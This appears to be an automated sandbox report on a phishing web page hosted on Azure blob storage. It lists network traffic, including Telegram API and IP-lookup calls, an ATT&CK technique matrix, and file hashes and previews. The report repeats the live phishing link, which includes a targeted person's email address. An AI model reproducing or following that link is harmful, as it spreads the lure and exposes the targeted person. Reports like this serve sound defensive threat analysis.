              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
              Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
              Source: global trafficDNS traffic detected: DNS query: image.thum.io
              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
              Source: global trafficDNS traffic detected: DNS query: dns.google
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: classification engineClassification label: mal68.phis.troj.win@21/22@46/267
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
              Application Layer Protocol
              Traffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              stackpath.bootstrapcdn.com
              104.18.10.207
              truefalse
                high
                d26p066pn2w0s0.cloudfront.net
                13.227.8.47
                truefalse
                  unknown
                  code.jquery.com
                  151.101.130.137
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      high
                      ipinfo.io
                      34.117.59.81
                      truefalse
                        high
                        maxcdn.bootstrapcdn.com
                        104.18.10.207
                        truefalse
                          high
                          www.google.com
                          142.250.181.100
                          truefalse
                            high
                            image.thum.io
                            34.200.110.203
                            truefalse
                              unknown
                              api.telegram.org
                              149.154.167.220
                              truefalse
                                high
                                dns.google
                                8.8.8.8
                                truefalse
                                  high
                                  ka-f.fontawesome.com
                                  unknown
                                  unknownfalse
                                    high
                                    kit.fontawesome.com
                                    unknown
                                    unknownfalse
                                      high
                                      logo.clearbit.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        20.60.23.161
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.18.10.207
                                        stackpath.bootstrapcdn.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.40.68
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        216.58.208.227
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        172.217.19.202
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        151.101.130.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        8.8.8.8
                                        dns.googleUnited States
                                        15169GOOGLEUSfalse
                                        149.154.167.220
                                        api.telegram.orgUnited Kingdom
                                        62041TELEGRAMRUfalse
                                        34.200.110.203
                                        image.thum.ioUnited States
                                        14618AMAZON-AESUSfalse
                                        172.217.19.170
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        64.233.162.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        172.217.17.42
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        104.21.26.223
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        172.217.19.238
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        1.1.1.1
                                        unknownAustralia
                                        13335CLOUDFLARENETUSfalse
                                        172.217.17.78
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        34.117.59.81
                                        ipinfo.ioUnited States
                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                        172.217.17.35
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        172.67.139.119
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        142.250.181.100
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.18.11.207
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        13.227.8.64
                                        unknownUnited States
                                        16509AMAZON-02USfalse
                                        104.17.25.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        13.227.8.47
                                        d26p066pn2w0s0.cloudfront.netUnited States
                                        16509AMAZON-02USfalse
                                        142.250.181.74
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        IP
                                        192.168.2.16
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1571602
                                        Start date and time:2024-12-09 15:04:15 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal68.phis.troj.win@21/22@46/267
                                        • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.162.84
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2689
                                        Entropy (8bit):4.012056722971348
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6D49E4854DF6A2359FFAE0CF21BF8546
                                        SHA1:3BAF25A02AE2F61CE2FDEB8D1D4F08776C4A3BC4
                                        SHA-256:E698AE09B819A5634941D9D79C17B74C8637AA2B4F452E8E64D756DF683322DE
                                        SHA-512:EE752B1758BE77A2DC07B21528BDB9A438F5CEC616AAD64622E24A7400EF227F2F0586844721EB668F03BBA7C1A6680536879420AAB9584E4CEB9CD0E8BFA4F8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.p....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.p....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.p..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):35
                                        Entropy (8bit):4.128724445269142
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:ED8D9A242ED49B201D3BC152B2EA7612
                                        SHA1:713BC8456C3E2439E6313ABBD3E93E81DCD9EA04
                                        SHA-256:A073439951D6AC57EDD9BF50B5AC9650397844B1F280AB0310156B331D8466EE
                                        SHA-512:D0191628C8F59E2E617B80865593F3A3EDD9F0E1EFE049A13D890E157A8D12314FD71C62F7F501047BDC5AB4623EA7D83109B905A837A060F6FCA6AAD482B527
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://image.thum.io/get/width/1200/http://
                                        Preview:Invalid url in thumbnail request...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:downloaded
                                        Size (bytes):28
                                        Entropy (8bit):4.137537511266052
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:AC2ACA9EAA84E1DEADB8507B24896865
                                        SHA1:39FEEC029B369917D2897C95FD450FF9EA64D08F
                                        SHA-256:881851041A64BE06D8BAFCFD2D1DD85F071FCD755178B529420DC5858141EF44
                                        SHA-512:A5389EDD199E38F65D350C560C8AC85545321FC4F169841F29F55CE3293C0C7454D38A709942235A3010EAAB91B99758CD5350629331AB0286BADBC9E4BFAD65
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkE9_TvgSxiTRIFDVNVgbUSBQ2MV9u3?alt=proto
                                        Preview:ChIKBw1TVYG1GgAKBw2MV9u3GgA=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                        Category:downloaded
                                        Size (bytes):7672
                                        Entropy (8bit):7.947423678742877
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6D142FBDC3E4B2295E9571A7ED499563
                                        SHA1:EE8DB632B3FEBCD4684565451E3AED3DF3D674F3
                                        SHA-256:E090068EAA196D65B33BC4F8D767771ED253F99FC8EAA80F542742D46966F4C9
                                        SHA-512:E87231967C5718B41CC176C3519D89F473FB46E0E2056A8646EA8646E377D13DC9638A83BAF5FCA53959A1E002008A1744CB5C8E699FF787BE29522CC3699935
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://logo.clearbit.com/phillyshipyard.com
                                        Preview:.PNG........IHDR.............L\......IDATx.....U.7..9..n.~%.t.$.HB.$....1...?....3.................`x."H.....A0F..B..N.....QU....s.v.. .~#.Z...b..[uj..~.bf.";....*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1..d.*...J@...1......7....d..~L...?....@.... ..I...0.<v7....<...".|.U.yV.B|....O.^./....|7'...z._..($.x...q.+..@[yC...:P.}..A.N...R.Y.;..{.~4./...;..7|.I.:.T@H.B.(.22.x.C.?...?p../...^.C.........n?.0..HE"..b%...F.o...~[T.....>:eq......j....?.~MPec2`..8..2V..A..3..P.:a.f..G*..E=....x...I..~E....:.>b._..........<'3.i])E2).W......<.P....$..... ..*..cBG.d........"R.....<2F..(.=.N.s..D..D..;b..q.{..v310""...lW.Y4... g....`T....X....Ax....|....V.zy.c+.".j.?..L.R..!b.W.......).E\FAC...<y.1..............s.9c..#.V..J.={.....;:....f......\...>......g....u.y..y..bK.@..$.Uc"B.!2....C.m...ot...._}..=JZ....H.......$.Y. %..1.=.k.pFdI(...>..S..2.0Ba..i=s....B....U..'
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):1350
                                        Entropy (8bit):5.437574579461789
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:048827075038BB29A926100FAC103075
                                        SHA1:344B5CF6498867A1806DB0287F339B12C00F34B5
                                        SHA-256:88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
                                        SHA-512:CFFBB765A48E681EAF3D11CA60999C4886A2CD88CCFCA7B6260AECD880B17ED2764568418D6D4086049D6E0F296BAF33E8F8979017541877F0D96B1AF6A16C6E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
                                        Preview:/* vietnamese */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text
                                        Category:downloaded
                                        Size (bytes):349136
                                        Entropy (8bit):4.946238535243504
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BC270A10BA75866CCD5176A3B3108CE4
                                        SHA1:3AFC67B336310F492DD7C9AC9459A171235DDE00
                                        SHA-256:55BB5EBFC749ED58BD7D6A5176D392F3E8D935E284D8E05C75D6EF3E9FF2296A
                                        SHA-512:F7EBA4EE18DF3470C37A75433B48AF5C538AEA452771DF3BC6F4565229A1A0CFF7A963BF8769792B8BCB5DD5110350BA6D57B14D9738D43FF158AB15BC1B2923
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D
                                        Preview:<html lang="...">..<head>. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. Styles, Javascript and other things go here -->. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>. <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>. <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=". crossorigin="anonymous"></script>. Required meta tags -->. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">. <link rel="icon" id="favicon" type="image/png" sizes="192x192". href="https://www.google.com/s2/favicons?domain=?v=BUILD_HASH">.. Bootstrap CSS -->. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1ao
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):271751
                                        Entropy (8bit):5.0685414131801165
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                        SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                        SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                        SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                        Malicious:false
                                        Reputation:unknown
